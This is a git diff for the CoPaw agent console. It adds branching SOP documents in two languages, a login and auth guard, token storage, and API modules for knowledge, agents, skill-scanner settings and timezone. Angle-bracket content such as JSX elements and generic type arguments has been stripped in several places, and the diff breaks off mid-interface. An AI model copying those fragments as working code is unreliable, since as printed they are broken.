diff --git a/.github/workflows/deploy-website.yml b/.github/workflows/deploy-website.yml index e526801b3..1f78aa25e 100644 --- a/.github/workflows/deploy-website.yml +++ b/.github/workflows/deploy-website.yml @@ -3,14 +3,8 @@ name: Deploy website to GitHub Pages on: - push: - branches: [main] - paths: - - "website/**" - - "scripts/install.sh" - - "scripts/install.ps1" - - "scripts/install.bat" - - ".github/workflows/deploy-website.yml" + release: + types: [published] workflow_dispatch: permissions: diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index f92be2432..09e8c83ef 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -12,6 +12,8 @@ Thank you for your interest in contributing to CoPaw! CoPaw is an open-source ** To keep collaboration smooth and maintain quality, please follow these guidelines. +> Branching recommendation: read the [Dual-Mainline Branching SOP (Local Collaboration)](DEV_BRANCHING_SOP.md) first. + ### 1. Check Existing Plans and Issues Before starting: diff --git a/CONTRIBUTING_zh.md b/CONTRIBUTING_zh.md index 8cb317cde..1ffb1e0eb 100644 --- a/CONTRIBUTING_zh.md +++ b/CONTRIBUTING_zh.md @@ -12,6 +12,8 @@ 为了保持协作顺畅并维护质量,请遵循以下指南。 +> 分支协作建议:请先阅读[双主线开发 SOP(本地协作版)](DEV_BRANCHING_SOP_zh.md)。 + ### 1. 检查现有计划和问题 在开始之前: diff --git a/DEV_BRANCHING_SOP.md b/DEV_BRANCHING_SOP.md new file mode 100644 index 000000000..27bea2ff2 --- /dev/null +++ b/DEV_BRANCHING_SOP.md @@ -0,0 +1,80 @@ +# CoPaw Dual-Mainline Branching SOP (Local Collaboration) + +This SOP standardizes local dual-mainline workflows and prevents accidental merges into the wrong mainline. + +## 1. Branch Roles + +- upstream/main: upstream source-of-truth mainline for sync and upstream PR baselines. +- fork/main: local development mainline where features are merged and validated first. +- main (local): choose exactly one model and keep it consistent. + - Model A (recommended): upstream mirror line. + - Model B: local release integration line. + +Important: The team must align on what local main means before daily work. + +## 2. Standard Development Flow + +1. Refresh base lines +- git fetch --all --prune +- git checkout fork/main +- git merge --ff-only upstream/main + +2. Create feature branch +- git checkout -b feat/upstream/ fork/main + +3. Develop and commit +- Follow Conventional Commits. +- Pass local gates before push/PR (pre-commit, pytest). + +4. First merge stage (required) +- Merge feature into fork/main first. +- Commands: + - git checkout fork/main + - git merge --no-ff feat/upstream/ + +5. Second merge stage (optional, policy-based) +- If main is a local release integration line: merge fork/main into main. +- If main is an upstream mirror line: do not merge fork/main directly into main; open PR to upstream/main instead. + +## 3. PR Target Mapping + +- For upstream contribution: + - source: feat/upstream/ (or cleaned equivalent) + - target: upstream/main +- For local fork integration: + - source: feat/upstream/ + - target: fork/main + +## 4. Pre-Merge Checklist + +- Working tree is clean (git status has no pending changes). +- Target branch is correct (fork/main or main). +- Local mainline role is explicit (mirror vs integration). +- Diff/log range is explainable (git log / git diff). +- Required tests have passed (at least local gates). + +## 5. Command Templates + +### 5.1 Merge into development mainline first (fork/main) + +- git checkout fork/main +- git merge --no-ff feat/upstream/knowledge-layer-mvp-sop-cognee + +### 5.2 Merge into local mainline (only when main = integration line) + +- git checkout main +- git merge --no-ff fork/main + +## 6. Common Pitfalls + +- Pitfall 1: Merge feature directly into main after implementation. + - Risk: pollutes mirror semantics if main is meant to track upstream. +- Pitfall 2: Let fork/main drift too far from upstream/main. + - Risk: conflict debt accumulates and PR review cost rises. +- Pitfall 3: Merge to mainline before local gates pass. + - Risk: unstable mainline and expensive rollback. + +## 7. Relation to CONTRIBUTING + +- This SOP complements, not replaces, CONTRIBUTING rules. +- Keep enforcing Conventional Commits, PR title format, pre-commit and test gates. diff --git a/DEV_BRANCHING_SOP_zh.md b/DEV_BRANCHING_SOP_zh.md new file mode 100644 index 000000000..46a0a8684 --- /dev/null +++ b/DEV_BRANCHING_SOP_zh.md @@ -0,0 +1,80 @@ +# CoPaw 双主线开发 SOP(本地协作版) + +本文用于规范本地双主线协作,避免 feature 直接误合到错误主线。 + +## 1. 分支角色 + +- upstream/main:上游事实主线,仅用于同步上游状态、构建上游 PR 基线。 +- fork/main:本地开发主线,功能先合入这里并完成验证。 +- main(本地):建议固定为以下两种之一。 + - 方案 A(推荐):上游镜像线。尽量保持与 upstream/main 对齐。 + - 方案 B:本地发布整合线。承接 fork/main,服务本地发布。 + +注意:项目内必须先统一 main 的定位,避免不同成员按不同语义操作。 + +## 2. 标准开发路径 + +1. 更新基线 +- git fetch --all --prune +- git checkout fork/main +- git merge --ff-only upstream/main + +2. 创建功能分支 +- git checkout -b feat/upstream/ fork/main + +3. 开发与提交 +- 按 Conventional Commits 提交。 +- push/提 PR 前通过本地门禁(pre-commit、pytest)。 + +4. 第一段合并(必须) +- 目标:先合入 fork/main。 +- 命令: + - git checkout fork/main + - git merge --no-ff feat/upstream/ + +5. 第二段合并(按需) +- 如果 main 是“本地发布整合线”:再将 fork/main 合入 main。 +- 如果 main 是“上游镜像线”:不要把 fork/main 直接合入 main;改为对 upstream/main 提 PR。 + +## 3. PR 与分支对应关系 + +- 面向 upstream: + - 源分支:feat/upstream/(或清理后的等价分支) + - 目标分支:upstream/main +- 面向 fork 内部整合: + - 源分支:feat/upstream/ + - 目标分支:fork/main + +## 4. 合并前检查清单 + +- 当前工作区干净(git status 无未提交改动)。 +- 当前目标分支正确(fork/main 或 main)。 +- 明确 main 当前语义(上游镜像线 / 本地发布整合线)。 +- 确认 feature 与目标分支差异范围可解释(git log/ git diff)。 +- 必要测试已通过(至少本地门禁)。 + +## 5. 推荐命令模板 + +### 5.1 先合开发主线(fork/main) + +- git checkout fork/main +- git merge --no-ff feat/upstream/knowledge-layer-mvp-sop-cognee + +### 5.2 再合本地 main(仅当 main=本地发布整合线) + +- git checkout main +- git merge --no-ff fork/main + +## 6. 常见误区 + +- 误区 1:feature 完成后直接合 main。 + - 风险:若 main 是上游镜像线,会污染镜像语义。 +- 误区 2:fork/main 与 upstream/main 长期不对齐。 + - 风险:后续冲突集中爆发,PR 审核成本升高。 +- 误区 3:未先做门禁验证就推进主线合并。 + - 风险:主线不稳定,后续回滚成本上升。 + +## 7. 与贡献规范的关系 + +- 本 SOP 不替代 CONTRIBUTING 中的提交与质量规范。 +- 所有分支流程仍需遵守:Conventional Commits、PR 标题规范、pre-commit 与测试门禁。 diff --git a/console/public/copaw-dark.png b/console/public/copaw-dark.png new file mode 100644 index 000000000..3dd738377 Binary files /dev/null and b/console/public/copaw-dark.png differ diff --git a/console/public/dark-logo.png b/console/public/dark-logo.png new file mode 100644 index 000000000..dc9daa85a Binary files /dev/null and b/console/public/dark-logo.png differ diff --git a/console/src/App.tsx b/console/src/App.tsx index ed39545a0..ef0d5496b 100644 --- a/console/src/App.tsx +++ b/console/src/App.tsx @@ -1,6 +1,6 @@ import { createGlobalStyle } from "antd-style"; import { ConfigProvider, bailianTheme } from "@agentscope-ai/design"; -import { BrowserRouter } from "react-router-dom"; +import { BrowserRouter, Routes, Route, Navigate } from "react-router-dom"; import { useEffect, useState } from "react"; import { useTranslation } from "react-i18next"; import zhCN from "antd/locale/zh_CN"; @@ -8,11 +8,16 @@ import enUS from "antd/locale/en_US"; import jaJP from "antd/locale/ja_JP"; import ruRU from "antd/locale/ru_RU"; import type { Locale } from "antd/es/locale"; +import { theme as antdTheme } from "antd"; import dayjs from "dayjs"; import "dayjs/locale/zh-cn"; import "dayjs/locale/ja"; import "dayjs/locale/ru"; import MainLayout from "./layouts/MainLayout"; +import { ThemeProvider, useTheme } from "./contexts/ThemeContext"; +import LoginPage from "./pages/Login"; +import { authApi } from "./api/modules/auth"; +import { getApiUrl, getApiToken, clearAuthToken } from "./api/config"; import "./styles/layout.css"; import "./styles/form-override.css"; @@ -37,8 +42,71 @@ const GlobalStyle = createGlobalStyle` } `; -function App() { +function AuthGuard({ children }: { children: React.ReactNode }) { + const [status, setStatus] = useState<"loading" | "auth-required" | "ok">( + "loading", + ); + + useEffect(() => { + let cancelled = false; + (async () => { + try { + const res = await authApi.getStatus(); + if (cancelled) return; + if (!res.enabled) { + setStatus("ok"); + return; + } + const token = getApiToken(); + if (!token) { + setStatus("auth-required"); + return; + } + try { + const r = await fetch(getApiUrl("/auth/verify"), { + headers: { Authorization: `Bearer ${token}` }, + }); + if (cancelled) return; + if (r.ok) { + setStatus("ok"); + } else { + clearAuthToken(); + setStatus("auth-required"); + } + } catch { + if (!cancelled) { + clearAuthToken(); + setStatus("auth-required"); + } + } + } catch { + if (!cancelled) setStatus("ok"); + } + })(); + return () => { + cancelled = true; + }; + }, []); + + if (status === "loading") return null; + if (status === "auth-required") + return ( + + ); + return <>{children}; +} + +function getRouterBasename(pathname: string): string | undefined { + return /^\/console(?:\/|$)/.test(pathname) ? "/console" : undefined; +} + +function AppInner() { + const basename = getRouterBasename(window.location.pathname); const { i18n } = useTranslation(); + const { isDark } = useTheme(); const lang = i18n.resolvedLanguage || i18n.language || "en"; const [antdLocale, setAntdLocale] = useState( antdLocaleMap[lang] ?? enUS, @@ -61,18 +129,42 @@ function App() { }, [i18n]); return ( - + - + + } /> + + + + } + /> + ); } +function App() { + return ( + + + + ); +} + export default App; diff --git a/console/src/api/config.ts b/console/src/api/config.ts index d13464fa5..1dbe8d17e 100644 --- a/console/src/api/config.ts +++ b/console/src/api/config.ts @@ -1,6 +1,8 @@ declare const BASE_URL: string; declare const TOKEN: string; +const AUTH_TOKEN_KEY = "copaw_auth_token"; + /** * Get the full API URL with /api prefix * @param path - API path (e.g., "/models", "/skills") @@ -14,9 +16,26 @@ export function getApiUrl(path: string): string { } /** - * Get the API token + * Get the API token - checks localStorage first (auth login), + * then falls back to the build-time TOKEN constant. * @returns API token string or empty string */ export function getApiToken(): string { + const stored = localStorage.getItem(AUTH_TOKEN_KEY); + if (stored) return stored; return typeof TOKEN !== "undefined" ? TOKEN : ""; } + +/** + * Store the auth token in localStorage after login. + */ +export function setAuthToken(token: string): void { + localStorage.setItem(AUTH_TOKEN_KEY, token); +} + +/** + * Remove the auth token from localStorage (logout / 401). + */ +export function clearAuthToken(): void { + localStorage.removeItem(AUTH_TOKEN_KEY); +} diff --git a/console/src/api/index.ts b/console/src/api/index.ts index fc3515551..116d809b6 100644 --- a/console/src/api/index.ts +++ b/console/src/api/index.ts @@ -7,12 +7,14 @@ export { getApiUrl, getApiToken } from "./config"; import { rootApi } from "./modules/root"; import { channelApi } from "./modules/channel"; import { heartbeatApi } from "./modules/heartbeat"; +import { knowledgeApi } from "./modules/knowledge"; import { cronJobApi } from "./modules/cronjob"; import { chatApi, sessionApi } from "./modules/chat"; import { envApi } from "./modules/env"; import { providerApi } from "./modules/provider"; import { skillApi } from "./modules/skill"; import { agentApi } from "./modules/agent"; +import { agentsApi } from "./modules/agents"; import { workspaceApi } from "./modules/workspace"; import { localModelApi } from "./modules/localModel"; import { ollamaModelApi } from "./modules/ollamaModel"; @@ -20,6 +22,7 @@ import { mcpApi } from "./modules/mcp"; import { tokenUsageApi } from "./modules/tokenUsage"; import { toolsApi } from "./modules/tools"; import { securityApi } from "./modules/security"; +import { userTimezoneApi } from "./modules/userTimezone"; export const api = { // Root @@ -31,6 +34,9 @@ export const api = { // Heartbeat ...heartbeatApi, + // Knowledge + ...knowledgeApi, + // Cron Jobs ...cronJobApi, @@ -71,6 +77,12 @@ export const api = { // Security ...securityApi, + + // User Timezone + ...userTimezoneApi, }; export default api; + +// Export individual APIs for direct access +export { agentsApi }; diff --git a/console/src/api/modules/agent.ts b/console/src/api/modules/agent.ts index 8e09a5f9a..e3d7a24ab 100644 --- a/console/src/api/modules/agent.ts +++ b/console/src/api/modules/agent.ts @@ -41,4 +41,45 @@ export const agentApi = { method: "PUT", body: JSON.stringify({ language }), }), + + getAudioMode: () => request<{ audio_mode: string }>("/agent/audio-mode"), + + updateAudioMode: (audio_mode: string) => + request<{ audio_mode: string }>("/agent/audio-mode", { + method: "PUT", + body: JSON.stringify({ audio_mode }), + }), + + getTranscriptionProviders: () => + request<{ + providers: { id: string; name: string; available: boolean }[]; + configured_provider_id: string; + }>("/agent/transcription-providers"), + + updateTranscriptionProvider: (provider_id: string) => + request<{ provider_id: string }>("/agent/transcription-provider", { + method: "PUT", + body: JSON.stringify({ provider_id }), + }), + + getTranscriptionProviderType: () => + request<{ transcription_provider_type: string }>( + "/agent/transcription-provider-type", + ), + + updateTranscriptionProviderType: (transcription_provider_type: string) => + request<{ transcription_provider_type: string }>( + "/agent/transcription-provider-type", + { + method: "PUT", + body: JSON.stringify({ transcription_provider_type }), + }, + ), + + getLocalWhisperStatus: () => + request<{ + available: boolean; + ffmpeg_installed: boolean; + whisper_installed: boolean; + }>("/agent/local-whisper-status"), }; diff --git a/console/src/api/modules/agents.ts b/console/src/api/modules/agents.ts new file mode 100644 index 000000000..0d1d1876d --- /dev/null +++ b/console/src/api/modules/agents.ts @@ -0,0 +1,60 @@ +import { request } from "../request"; +import type { + AgentListResponse, + AgentProfileConfig, + CreateAgentRequest, + AgentProfileRef, +} from "../types/agents"; +import type { MdFileInfo, MdFileContent } from "../types/workspace"; + +// Multi-agent management API +export const agentsApi = { + // List all agents + listAgents: () => request("/agents"), + + // Get agent details + getAgent: (agentId: string) => + request(`/agents/${agentId}`), + + // Create new agent + createAgent: (agent: CreateAgentRequest) => + request("/agents", { + method: "POST", + body: JSON.stringify(agent), + }), + + // Update agent configuration + updateAgent: (agentId: string, agent: AgentProfileConfig) => + request(`/agents/${agentId}`, { + method: "PUT", + body: JSON.stringify(agent), + }), + + // Delete agent + deleteAgent: (agentId: string) => + request<{ success: boolean; agent_id: string }>(`/agents/${agentId}`, { + method: "DELETE", + }), + + // Agent workspace files + listAgentFiles: (agentId: string) => + request(`/agents/${agentId}/files`), + + readAgentFile: (agentId: string, filename: string) => + request( + `/agents/${agentId}/files/${encodeURIComponent(filename)}`, + ), + + writeAgentFile: (agentId: string, filename: string, content: string) => + request<{ written: boolean; filename: string }>( + `/agents/${agentId}/files/${encodeURIComponent(filename)}`, + { + method: "PUT", + body: JSON.stringify({ content }), + }, + ), + + // Agent memory files + listAgentMemory: (agentId: string) => + request(`/agents/${agentId}/memory`), +}; diff --git a/console/src/api/modules/auth.ts b/console/src/api/modules/auth.ts new file mode 100644 index 000000000..19da57f37 --- /dev/null +++ b/console/src/api/modules/auth.ts @@ -0,0 +1,49 @@ +import { getApiUrl } from "../config"; + +export interface LoginResponse { + token: string; + username: string; + message?: string; +} + +export interface AuthStatusResponse { + enabled: boolean; + has_users: boolean; +} + +export const authApi = { + login: async (username: string, password: string): Promise => { + const res = await fetch(getApiUrl("/auth/login"), { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ username, password }), + }); + if (!res.ok) { + const err = await res.json().catch(() => ({})); + throw new Error(err.detail || "Login failed"); + } + return res.json(); + }, + + register: async ( + username: string, + password: string, + ): Promise => { + const res = await fetch(getApiUrl("/auth/register"), { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ username, password }), + }); + if (!res.ok) { + const err = await res.json().catch(() => ({})); + throw new Error(err.detail || "Registration failed"); + } + return res.json(); + }, + + getStatus: async (): Promise => { + const res = await fetch(getApiUrl("/auth/status")); + if (!res.ok) throw new Error("Failed to check auth status"); + return res.json(); + }, +}; diff --git a/console/src/api/modules/chat.ts b/console/src/api/modules/chat.ts index 422f12fca..7d354a29a 100644 --- a/console/src/api/modules/chat.ts +++ b/console/src/api/modules/chat.ts @@ -43,6 +43,13 @@ export const chatApi = { body: JSON.stringify(chatIds), }, ), + + /** Stop a running console chat (only stop when user clicks stop). chat_id = ChatSpec.id */ + stopConsoleChat: (chatId: string) => + request<{ stopped: boolean }>( + `/console/chat/stop?chat_id=${encodeURIComponent(chatId)}`, + { method: "POST" }, + ), }; export const sessionApi = { diff --git a/console/src/api/modules/knowledge.ts b/console/src/api/modules/knowledge.ts new file mode 100644 index 000000000..65bc64836 --- /dev/null +++ b/console/src/api/modules/knowledge.ts @@ -0,0 +1,199 @@ +import { getApiUrl } from "../config"; +import { request } from "../request"; +import type { + KnowledgeBulkIndexResult, + KnowledgeConfig, + KnowledgeHistoryBackfillRunResponse, + KnowledgeHistoryBackfillStatus, + KnowledgeRestoreResponse, + KnowledgeIndexResult, + KnowledgeClearResponse, + KnowledgeSearchResponse, + KnowledgeSourceContent, + KnowledgeSourceSpec, + KnowledgeSourcesResponse, +} from "../types"; + +export const knowledgeApi = { + getKnowledgeConfig: () => request("/knowledge/config"), + + updateKnowledgeConfig: (payload: KnowledgeConfig) => + request("/knowledge/config", { + method: "PUT", + body: JSON.stringify(payload), + }), + + listKnowledgeSources: () => + request("/knowledge/sources"), + + upsertKnowledgeSource: (payload: KnowledgeSourceSpec) => + request("/knowledge/sources", { + method: "PUT", + body: JSON.stringify(payload), + }), + + uploadKnowledgeFile: async (sourceId: string, file: File) => { + const formData = new FormData(); + formData.append("source_id", sourceId); + formData.append("file", file); + + const response = await fetch(getApiUrl("/knowledge/upload/file"), { + method: "POST", + body: formData, + }); + if (!response.ok) { + const text = await response.text().catch(() => ""); + throw new Error( + `Upload failed: ${response.status} ${response.statusText}${ + text ? ` - ${text}` : "" + }`, + ); + } + return (await response.json()) as { location: string; filename: string }; + }, + + uploadKnowledgeDirectory: async ( + sourceId: string, + files: Array<{ file: File; relativePath: string }>, + ) => { + const formData = new FormData(); + formData.append("source_id", sourceId); + files.forEach(({ file, relativePath }) => { + formData.append("files", file); + formData.append("relative_paths", relativePath); + }); + + const response = await fetch(getApiUrl("/knowledge/upload/directory"), { + method: "POST", + body: formData, + }); + if (!response.ok) { + const text = await response.text().catch(() => ""); + throw new Error( + `Upload failed: ${response.status} ${response.statusText}${ + text ? ` - ${text}` : "" + }`, + ); + } + return (await response.json()) as { location: string; file_count: number }; + }, + + deleteKnowledgeSource: (sourceId: string) => + request<{ deleted: boolean; source_id: string }>( + `/knowledge/sources/${encodeURIComponent(sourceId)}`, + { + method: "DELETE", + }, + ), + + clearKnowledge: (params?: { removeSources?: boolean }) => + request( + `/knowledge/clear?confirm=true&remove_sources=${ + params?.removeSources === false ? "false" : "true" + }`, + { + method: "DELETE", + }, + ), + + indexKnowledgeSource: (sourceId: string) => + request( + `/knowledge/sources/${encodeURIComponent(sourceId)}/index`, + { + method: "POST", + }, + ), + + indexAllKnowledgeSources: () => + request("/knowledge/index", { + method: "POST", + }), + + getKnowledgeHistoryBackfillStatus: () => + request("/knowledge/history-backfill/status"), + + runKnowledgeHistoryBackfillNow: () => + request("/knowledge/history-backfill/run", { + method: "POST", + }), + + getKnowledgeSourceContent: (sourceId: string) => + request( + `/knowledge/sources/${encodeURIComponent(sourceId)}/content`, + ), + + searchKnowledge: (params: { + query: string; + limit?: number; + sourceIds?: string[]; + sourceTypes?: string[]; + }) => { + const searchParams = new URLSearchParams({ + q: params.query, + limit: String(params.limit ?? 10), + }); + if (params.sourceIds?.length) { + searchParams.set("source_ids", params.sourceIds.join(",")); + } + if (params.sourceTypes?.length) { + searchParams.set("source_types", params.sourceTypes.join(",")); + } + return request( + `/knowledge/search?${searchParams.toString()}`, + ); + }, + + downloadKnowledgeBackup: async (): Promise => { + const response = await fetch(getApiUrl("/knowledge/backup"), { + method: "GET", + }); + if (!response.ok) { + throw new Error( + `Knowledge backup failed: ${response.status} ${response.statusText}`, + ); + } + return await response.blob(); + }, + + downloadKnowledgeSourceBackup: async (sourceId: string): Promise => { + const response = await fetch( + getApiUrl(`/knowledge/backup/${encodeURIComponent(sourceId)}`), + { + method: "GET", + }, + ); + if (!response.ok) { + throw new Error( + `Knowledge source backup failed: ${response.status} ${response.statusText}`, + ); + } + return await response.blob(); + }, + + restoreKnowledgeBackup: async ( + file: File, + replaceExisting = true, + ): Promise => { + const formData = new FormData(); + formData.append("file", file); + + const response = await fetch( + getApiUrl( + `/knowledge/restore?replace_existing=${replaceExisting ? "true" : "false"}`, + ), + { + method: "POST", + body: formData, + }, + ); + if (!response.ok) { + const text = await response.text().catch(() => ""); + throw new Error( + `Knowledge restore failed: ${response.status} ${response.statusText}${ + text ? ` - ${text}` : "" + }`, + ); + } + return (await response.json()) as KnowledgeRestoreResponse; + }, +}; \ No newline at end of file diff --git a/console/src/api/modules/security.ts b/console/src/api/modules/security.ts index 4332fe37b..2a6580391 100644 --- a/console/src/api/modules/security.ts +++ b/console/src/api/modules/security.ts @@ -20,7 +20,51 @@ export interface ToolGuardConfig { disabled_rules: string[]; } +// ── Skill Scanner types ──────────────────────────────────────────── + +export interface SkillScannerWhitelistEntry { + skill_name: string; + content_hash: string; + added_at: string; +} + +export type SkillScannerMode = "block" | "warn" | "off"; + +export interface SkillScannerConfig { + mode: SkillScannerMode; + timeout: number; + whitelist: SkillScannerWhitelistEntry[]; +} + +export interface BlockedSkillFinding { + severity: string; + title: string; + description: string; + file_path: string; + line_number: number | null; + rule_id: string; +} + +export interface BlockedSkillRecord { + skill_name: string; + blocked_at: string; + max_severity: string; + findings: BlockedSkillFinding[]; + content_hash: string; + action: "blocked" | "warned"; +} + +export interface SecurityScanErrorResponse { + type: "security_scan_failed"; + detail: string; + skill_name: string; + max_severity: string; + findings: BlockedSkillFinding[]; +} + export const securityApi = { + // ── Tool Guard ────────────────────────────────────────────────── + getToolGuard: () => request("/config/security/tool-guard"), updateToolGuard: (body: ToolGuardConfig) => @@ -31,4 +75,52 @@ export const securityApi = { getBuiltinRules: () => request("/config/security/tool-guard/builtin-rules"), + + // ── Skill Scanner ─────────────────────────────────────────────── + + getSkillScanner: () => + request("/config/security/skill-scanner"), + + updateSkillScanner: (body: SkillScannerConfig) => + request("/config/security/skill-scanner", { + method: "PUT", + body: JSON.stringify(body), + }), + + getBlockedHistory: () => + request( + "/config/security/skill-scanner/blocked-history", + ), + + clearBlockedHistory: () => + request<{ cleared: boolean }>( + "/config/security/skill-scanner/blocked-history", + { method: "DELETE" }, + ), + + removeBlockedEntry: (index: number) => + request<{ removed: boolean }>( + `/config/security/skill-scanner/blocked-history/${index}`, + { method: "DELETE" }, + ), + + addToWhitelist: (skillName: string, contentHash: string = "") => + request<{ whitelisted: boolean; skill_name: string }>( + "/config/security/skill-scanner/whitelist", + { + method: "POST", + body: JSON.stringify({ + skill_name: skillName, + content_hash: contentHash, + }), + }, + ), + + removeFromWhitelist: (skillName: string) => + request<{ removed: boolean; skill_name: string }>( + `/config/security/skill-scanner/whitelist/${encodeURIComponent( + skillName, + )}`, + { method: "DELETE" }, + ), }; diff --git a/console/src/api/modules/userTimezone.ts b/console/src/api/modules/userTimezone.ts new file mode 100644 index 000000000..dc56d055f --- /dev/null +++ b/console/src/api/modules/userTimezone.ts @@ -0,0 +1,15 @@ +import { request } from "../request"; + +export interface UserTimezoneConfig { + timezone: string; +} + +export const userTimezoneApi = { + getUserTimezone: () => request("/config/user-timezone"), + + updateUserTimezone: (timezone: string) => + request("/config/user-timezone", { + method: "PUT", + body: JSON.stringify({ timezone }), + }), +}; diff --git a/console/src/api/request.ts b/console/src/api/request.ts index 35d1cf471..2e190f5b8 100644 --- a/console/src/api/request.ts +++ b/console/src/api/request.ts @@ -1,4 +1,4 @@ -import { getApiUrl, getApiToken } from "./config"; +import { getApiUrl, getApiToken, clearAuthToken } from "./config"; function buildHeaders(method?: string, extra?: HeadersInit): Headers { // Normalize extra to a Headers instance for consistent handling @@ -18,6 +18,21 @@ function buildHeaders(method?: string, extra?: HeadersInit): Headers { headers.set("Authorization", `Bearer ${token}`); } + // Add selected agent ID to all requests (for multi-agent support) + try { + const agentStorage = localStorage.getItem("copaw-agent-storage"); + if (agentStorage) { + const parsed = JSON.parse(agentStorage); + const selectedAgent = parsed?.state?.selectedAgent; + if (selectedAgent) { + headers.set("X-Agent-Id", selectedAgent); + } + } + } catch (error) { + // Ignore localStorage errors + console.warn("Failed to get selected agent from storage:", error); + } + return headers; } @@ -35,6 +50,15 @@ export async function request( }); if (!response.ok) { + // Handle 401: clear token and redirect to login + if (response.status === 401) { + clearAuthToken(); + if (window.location.pathname !== "/login") { + window.location.href = "/login"; + } + throw new Error("Not authenticated"); + } + const text = await response.text().catch(() => ""); throw new Error( `Request failed: ${response.status} ${response.statusText}${ diff --git a/console/src/api/types/agent.ts b/console/src/api/types/agent.ts index 5b1611567..8406fba86 100644 --- a/console/src/api/types/agent.ts +++ b/console/src/api/types/agent.ts @@ -13,4 +13,10 @@ export interface AgentsRunningConfig { memory_reserve_ratio: number; enable_tool_result_compact: boolean; tool_result_compact_keep_n: number; + knowledge_enabled: boolean; + knowledge_auto_collect_chat_files: boolean; + knowledge_auto_collect_chat_urls: boolean; + knowledge_auto_collect_long_text: boolean; + knowledge_long_text_min_chars: number; + knowledge_chunk_size: number; } diff --git a/console/src/api/types/agents.ts b/console/src/api/types/agents.ts new file mode 100644 index 000000000..abc80a74e --- /dev/null +++ b/console/src/api/types/agents.ts @@ -0,0 +1,39 @@ +// Multi-agent management types + +export interface AgentSummary { + id: string; + name: string; + description: string; + workspace_dir: string; +} + +export interface AgentListResponse { + agents: AgentSummary[]; +} + +export interface AgentProfileConfig { + id: string; + name: string; + description?: string; + workspace_dir?: string; + channels?: unknown; + mcp?: unknown; + heartbeat?: unknown; + running?: unknown; + llm_routing?: unknown; + system_prompt_files?: string[]; + tools?: unknown; + security?: unknown; +} + +export interface CreateAgentRequest { + name: string; + description?: string; + workspace_dir?: string; + language?: string; +} + +export interface AgentProfileRef { + id: string; + workspace_dir: string; +} diff --git a/console/src/api/types/channel.ts b/console/src/api/types/channel.ts index 8c96659cd..67ab7d0ba 100644 --- a/console/src/api/types/channel.ts +++ b/console/src/api/types/channel.ts @@ -23,6 +23,10 @@ export interface DiscordConfig extends BaseChannelConfig { export interface DingTalkConfig extends BaseChannelConfig { client_id: string; client_secret: string; + message_type: string; + card_template_id: string; + card_template_key: string; + robot_code: string; } export interface FeishuConfig extends BaseChannelConfig { @@ -81,6 +85,14 @@ export interface VoiceChannelConfig extends BaseChannelConfig { welcome_greeting: string; } +export interface XiaoYiConfig extends BaseChannelConfig { + ak: string; + sk: string; + agent_id: string; + ws_url: string; + task_timeout_ms?: number; +} + export interface ChannelConfig { imessage: IMessageChannelConfig; discord: DiscordConfig; @@ -92,6 +104,7 @@ export interface ChannelConfig { matrix: MatrixConfig; console: ConsoleConfig; voice: VoiceChannelConfig; + xiaoyi: XiaoYiConfig; } export type SingleChannelConfig = @@ -104,4 +117,5 @@ export type SingleChannelConfig = | TelegramConfig | MQTTConfig | MatrixConfig - | VoiceChannelConfig; + | VoiceChannelConfig + | XiaoYiConfig; diff --git a/console/src/api/types/chat.ts b/console/src/api/types/chat.ts index 5846b0686..9b7610269 100644 --- a/console/src/api/types/chat.ts +++ b/console/src/api/types/chat.ts @@ -1,3 +1,5 @@ +export type ChatStatus = "idle" | "running"; + export interface ChatSpec { id: string; // Chat UUID identifier session_id: string; // Session identifier (channel:user_id format) @@ -6,6 +8,7 @@ export interface ChatSpec { created_at: string | null; // Chat creation timestamp (ISO 8601) updated_at: string | null; // Chat last update timestamp (ISO 8601) meta?: Record; // Additional metadata + status?: ChatStatus; // Conversation status: idle or running } export interface Message { @@ -16,6 +19,7 @@ export interface Message { export interface ChatHistory { messages: Message[]; + status?: ChatStatus; // Conversation status: idle or running } export interface ChatDeleteResponse { diff --git a/console/src/api/types/index.ts b/console/src/api/types/index.ts index 91db60d3c..86ad7790c 100644 --- a/console/src/api/types/index.ts +++ b/console/src/api/types/index.ts @@ -1,6 +1,8 @@ export * from "./agent"; +export * from "./agents"; export * from "./channel"; export * from "./heartbeat"; +export * from "./knowledge"; export * from "./chat"; export * from "./cronjob"; export * from "./env"; diff --git a/console/src/api/types/knowledge.ts b/console/src/api/types/knowledge.ts new file mode 100644 index 000000000..0c9a9ea06 --- /dev/null +++ b/console/src/api/types/knowledge.ts @@ -0,0 +1,155 @@ +export type KnowledgeSourceType = + | "file" + | "directory" + | "url" + | "text" + | "chat"; + +export interface KnowledgeSourceSpec { + id: string; + name: string; + type: KnowledgeSourceType; + location: string; + content: string; + enabled: boolean; + recursive: boolean; + tags: string[]; + summary: string; +} + +export interface KnowledgeIndexConfig { + chunk_size: number; + chunk_overlap: number; + max_file_size: number; + include_globs: string[]; + exclude_globs: string[]; +} + +export interface KnowledgeAutomationConfig { + knowledge_auto_collect_chat_files: boolean; + knowledge_auto_collect_chat_urls: boolean; + knowledge_auto_collect_long_text: boolean; + knowledge_long_text_min_chars: number; +} + +export interface KnowledgeConfig { + version: number; + enabled: boolean; + sources: KnowledgeSourceSpec[]; + index: KnowledgeIndexConfig; + automation: KnowledgeAutomationConfig; +} + +export interface KnowledgeSourceStatus { + indexed: boolean; + indexed_at: string | null; + document_count: number; + chunk_count: number; + error: string | null; + remote_status?: string; + remote_cache_state?: string; + remote_fail_count?: number; + remote_next_retry_at?: string | null; + remote_last_error?: string | null; + remote_updated_at?: string | null; +} + +export interface KnowledgeSourceItem extends KnowledgeSourceSpec { + subject?: string; + keywords?: string[]; + status: KnowledgeSourceStatus; +} + +export interface KnowledgeSourcesResponse { + enabled: boolean; + sources: KnowledgeSourceItem[]; +} + +export interface KnowledgeIndexResult { + source_id: string; + document_count: number; + chunk_count: number; + indexed_at: string; +} + +export interface KnowledgeBulkIndexResult { + indexed_sources: number; + results: KnowledgeIndexResult[]; +} + +export interface KnowledgeSearchHit { + source_id: string; + source_name: string; + source_type: KnowledgeSourceType; + document_path: string; + document_title: string; + score: number; + snippet: string; +} + +export interface KnowledgeSearchResponse { + query: string; + hits: KnowledgeSearchHit[]; +} + +export interface KnowledgeHistoryBackfillStatus { + has_backfill_record: boolean; + backfill_completed: boolean; + marked_unbackfilled: boolean; + history_chat_count: number; + has_pending_history: boolean; + progress?: KnowledgeHistoryBackfillProgress; +} + +export interface KnowledgeHistoryBackfillProgress { 